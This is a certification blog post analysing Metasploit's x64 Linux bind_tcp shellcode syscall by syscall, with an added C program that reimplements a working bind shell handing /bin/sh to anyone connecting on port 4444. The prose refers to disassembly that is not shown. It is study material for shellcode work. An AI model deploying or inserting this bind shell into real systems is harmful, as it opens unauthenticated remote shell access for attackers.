SLAE64: Assignment 5 – Metasploit payloads analysis #2

The second payload I decided to analyze for the 5th assignment of the SecurityTube Linux Assembly Expert certification was linux/x64/shell/bind_tcp.

This payload is 86 bytes long, which impressed me compared with what I achieved with my own bind shell implementation, even allowing for the fact that mine was password protected.

The code starts, as expected, with the socket() system call and stores the returned sockfd in rdi. The use of cdq to null rdx is a smart way to save a byte: cdq is one byte against two for xor edx, edx, and since eax holds a small positive value (the syscall number) at that point, sign-extending it into edx yields zero. Likewise, swapping rax into rdi with xchg is one byte shorter than the equivalent mov and does not change the functionality.

In the initial section above, the sockaddr structure used by the subsequent syscalls is prepared by storing it on the stack and loading its address into rsi. The authors evidently decided to save bytes by filling the structure with a single mov of a 32-bit immediate (sin_family followed by the port in network byte order), but this comes at the cost of a null byte in the resulting shellcode: AF_INET is 2, which encodes as the little-endian word 02 00 regardless of the port chosen. I also believe the mov instruction could easily be replaced by a push/pop combination that achieves the same end result while saving one more byte.

The call to the bind() system call follows without much to add: rdi already contains the sockfd and rsi already contains the address of the sockaddr structure.

With the socket bound to the desired port (4444 in this example), it is time to call the listen() syscall, which marks the socket as passive. Note that listen() itself returns immediately; it is the subsequent accept() that blocks until a connection comes in. Nothing else special to note here.

In the code above, once a connection is made to the desired port, a call to the accept() system call (0x2b, i.e. 43 as per unistd_64.h) is issued and returns the connected socket.

The last instruction above stores the new socket file descriptor returned in rax into rdi, ready for use in the next syscall.

The section above simply redirects STDERR, STDOUT and STDIN to the new socket by calling the dup2() system call in a loop over the file descriptors 0x2, 0x1 and 0x0, counting down.

The final section sets up the call to the execve() syscall, which runs the '/bin/sh' shell.

Again, the use of cdq to null rdx is very smart, but I believe the code could be optimized even further by replacing the mov instruction at 0x4000c9 with a push/pop combination, which would save us one more byte.
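To make the walk-through above concrete, here is an added example of my own (it is not the Metasploit payload and not disassembly from it): the same syscall sequence written in C against the raw x86-64 syscall numbers from unistd_64.h, together with a helper that packs the start of sockaddr_in exactly as the payload's single mov does and reports where the null byte lands in the encoded instruction. The function names (pack_sockaddr_imm, encode_mov_rsp_imm32, null_offset_in_sockaddr_mov, bind_shell) are mine; the opcode bytes C7 04 24 for `mov dword [rsp], imm32` and the syscall numbers are the real x86-64 encodings. The bind_shell function only runs when the program is started with --listen, since it hands /bin/sh to whoever connects.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

/* x86-64 syscall numbers from unistd_64.h, in the order the payload uses them. */
enum {
    NR_SOCKET = 41,  /* 0x29 */
    NR_BIND   = 49,  /* 0x31 */
    NR_LISTEN = 50,  /* 0x32 */
    NR_ACCEPT = 43,  /* 0x2b */
    NR_DUP2   = 33,  /* 0x21 */
    NR_EXECVE = 59   /* 0x3b */
};

/* The payload writes the start of sockaddr_in as one 32-bit immediate:
 * sin_family (AF_INET = 2) as a little-endian word, then sin_port in
 * network byte order. sin_addr and the padding come from the zeroed qword
 * pushed just before it. For port 4444 (0x115c) this gives 0x5c110002. */
static uint32_t pack_sockaddr_imm(uint16_t port)
{
    uint16_t port_be = (uint16_t)((port >> 8) | (port << 8));
    return 2u | ((uint32_t)port_be << 16);
}

/* Encode `mov dword [rsp], imm32` (opcode C7 04 24 followed by the
 * little-endian immediate) into buf. Returns the instruction length, 7. */
static size_t encode_mov_rsp_imm32(uint32_t imm, uint8_t *buf)
{
    buf[0] = 0xC7; buf[1] = 0x04; buf[2] = 0x24;
    for (int i = 0; i < 4; i++)
        buf[3 + i] = (uint8_t)(imm >> (8 * i));
    return 7;
}

/* Offset of the first null byte in the encoded mov for a given port, or -1
 * if there is none. The high byte of the AF_INET word is always zero, so
 * every port yields a null at offset 4 (the 4th byte of the immediate's
 * 4-byte field is 0x00 right after 0x02). */
static int null_offset_in_sockaddr_mov(uint16_t port)
{
    uint8_t buf[7];
    size_t n = encode_mov_rsp_imm32(pack_sockaddr_imm(port), buf);
    for (size_t i = 0; i < n; i++)
        if (buf[i] == 0)
            return (int)i;
    return -1;
}

/* The payload's syscall sequence in C using raw syscall numbers.
 * Returns -1 on the first failing syscall; on success it never returns. */
static long bind_shell(uint16_t port)
{
    uint8_t sa[16] = {0};                 /* sockaddr_in, zeroed like the pushed rdx */
    uint32_t imm = pack_sockaddr_imm(port);
    for (int i = 0; i < 4; i++)
        sa[i] = (uint8_t)(imm >> (8 * i));

    long fd = syscall(NR_SOCKET, 2, 1, 0);            /* socket(AF_INET, SOCK_STREAM, 0) */
    if (fd < 0) return -1;
    if (syscall(NR_BIND, fd, sa, sizeof sa) < 0) return -1;
    if (syscall(NR_LISTEN, fd, 1) < 0) return -1;     /* returns at once */
    long client = syscall(NR_ACCEPT, fd, NULL, NULL); /* this is the call that blocks */
    if (client < 0) return -1;
    for (long i = 2; i >= 0; i--)                     /* dup2 over 2, 1, 0 as the payload does */
        if (syscall(NR_DUP2, client, i) < 0) return -1;
    char *sh_argv[] = { "/bin/sh", NULL };
    syscall(NR_EXECVE, "/bin/sh", sh_argv, NULL);
    return -1;                                        /* only reached if execve failed */
}

int main(int argc, char **argv)
{
    uint16_t port = 4444;
    uint8_t buf[7];
    size_t n = encode_mov_rsp_imm32(pack_sockaddr_imm(port), buf);
    printf("mov dword [rsp], 0x%08x:", pack_sockaddr_imm(port));
    for (size_t i = 0; i < n; i++) printf(" %02x", buf[i]);
    printf("  (null at offset %d)\n", null_offset_in_sockaddr_mov(port));
    if (argc > 1 && strcmp(argv[1], "--listen") == 0)
        return (int)bind_shell(port);
    return 0;
}
```

Run without arguments to see the encoded bytes `c7 04 24 02 00 11 5c` and the position of the null; the null sits in the AF_INET word, not in the port, which is why changing the port alone never removes it.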

Overall, I believe the code could still be optimized a little further, but I have learned some nice optimizations that I may come to apply to my own shellcode.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification.

Student ID: SLAE64-1440
